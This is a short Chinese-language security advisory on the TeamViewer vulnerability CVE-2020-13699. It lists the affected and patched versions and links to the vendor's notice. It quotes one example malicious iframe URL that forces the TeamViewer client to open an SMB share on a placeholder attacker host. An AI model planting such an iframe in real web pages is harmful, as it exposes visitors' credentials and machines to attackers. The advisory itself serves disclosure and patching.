【安全通报】TeamViewer 全系版本曝无需密码即可入侵你电脑漏洞（CVE-2020-13699）

TeamViewer 官方发布最近修复了一个漏洞，该漏洞可能使攻击者悄悄地建立与您计算机的连接并进一步利用该系统，该漏洞编号为 CVE-2020-13699，CVSS 评分 9.8 分。

攻击者可以使用精心制作的URL （if rame src='teamviewer10: --play \\attacker-IP\share\fake.tvs'）将恶意 iframe 嵌入网站中，该 URL 会启动 TeamViewer Windows 桌面客户端并迫使其打开远程 SMB 共享，由于SMB共享，并且是受害者的计算机发起与攻击者的SMB共享的连接，因此攻击者不需要知道用户的密码。他们将自动通过身份验证并获得访问权限。

CVE 编号

CVE-2020-13699

影响范围

• TeamViewer < 8.0.258861
• TeamViewer < 9.0.28860
• TeamViewer < 10.0.258873
• TeamViewer < 11.0.258870
• TeamViewer < 12.0.258869
• TeamViewer < 13.2.36220
• TeamViewer < 14.2.56676
• TeamViewer < 15.8.3

修复建议

目前官方已发布漏洞修复版本：

8.0.258861

9.0.28860

10.0.258873

11.0.258870

12.0.258869

13.2.36220

14.2.56676

14.7.48350

15.8.3

参考

[1] https://community.teamviewer.com/t5/Announcements-ZH/%E5%85%B3%E4%BA%8ECVE-2020-13699%E7%9A%84%E5%A3%B0%E6%98%8E/td-p/98541

白帽汇从事信息安全，专注于安全大数据、企业威胁情报。

公司产品：FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。

为您提供：网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。